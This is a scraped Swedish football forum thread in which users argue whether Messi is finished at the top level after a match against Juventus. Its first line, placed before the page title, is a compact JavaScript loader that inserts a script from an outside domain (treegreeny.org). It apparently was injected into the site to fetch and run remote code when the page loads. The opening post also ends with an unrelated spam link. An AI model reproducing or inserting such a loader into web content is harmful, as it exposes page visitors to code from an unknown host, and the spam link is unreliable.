;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Opopulärt yttrande – Messi är klar på högsta nivå – Fotboll – FMSweden Forum
Meny Stäng

Opopulärt yttrande ...
 
Share:
Notifications
Clear all

Opopulärt yttrande - Messi är klar på högsta nivå

5 Inlägg
5 Users
8 Reactions
446 Visningar
(@wileymorris)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
Topic starter  

När han såg honom idag mot Juventus såg han ganska dåligt ut och hanterades lätt av relativt genomsnittliga försvarare. Omedveten om sin omgivning, långsam på bollen och inte kan röra kroppen tillräckligt snabbt. Dembele kände en viss ånger kunde lätt ha tagit några bra chanser men gav dem till Messi för att försöka göra mål men han misslyckades med dem. Jag tror att han har 0 öppna fältmål eller assist i åtta matcher vilket är förvånande på denna nivå. Jag tvivlar på att det är en brist på motivation eftersom presidenten har avgått och jag minns att i ett av de tidigare matcherna mot Celta Vito var han så desperat att göra mål från hörna. Jag kommer också ihåg att han sprang på bollen och försvarare sprang effektivt framför honom, han var så långsam. Han är inte längre värt 100 miljoner euro per år. När en legend går mot solnedgången ska de lämna när frågan är varför och inte när. Som Iniesta och Xavi gjorde. Folk fortsätter att säga om Ronaldo kan göra det än Messi kan. Han hade aldrig kroppen av en Ronaldo eller Ibrahimovic att hålla i slutet av 30-talet på denna nivå. https://omegle.onl/

This topic was modified 4 år sedan by WileyMorris

   
Citera
roniii
(@roniii)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 21
 

Jisses... Detta fick mig att logga in på sidan!

Messi är långt ifrån klar på högsta nivå, om du har hängt med i svängarna senaste månaderna så vet du vad hans dåliga form grundar sig i. Han behöver inte ha kroppen som Ronaldo/Zlatan, han har spelintelligensen som kommer tillåta honom att fortsätta prestera på allra högsta nivå.

Sen kan du inte säga att Messi hanterades lätt igår mot Juve? Det enda han saknade var ett mål, i övrigt hade han relativt lätt att komma förbi och komma till lägen. 

 

Ses. 


   
SvaraCitera
Patrick92
(@patrick92)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 20
 

Förstår ingenting av det som trådstartaren säger, haha. 


   
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

Håller helt med. Messi är finito på högsta nivån. Inte ett mål i öppet spel ännu den här säsongen. Rätt värdelös i spelet också. Ge det en säsong till och han är rent av en börda för Barcelona, men där klubben inte kommer kunna skiljas. Såvida inte Messi gör klubben en tjänst och lämnar när kontraktet gått ut. 


   
Micke reacted
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@onkel-fester

Lär ju snacka med Man City i vinter.


   
SvaraCitera
Share: